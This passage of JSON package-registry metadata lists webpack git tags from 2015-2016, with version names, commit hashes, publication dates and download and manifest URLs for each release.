0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b11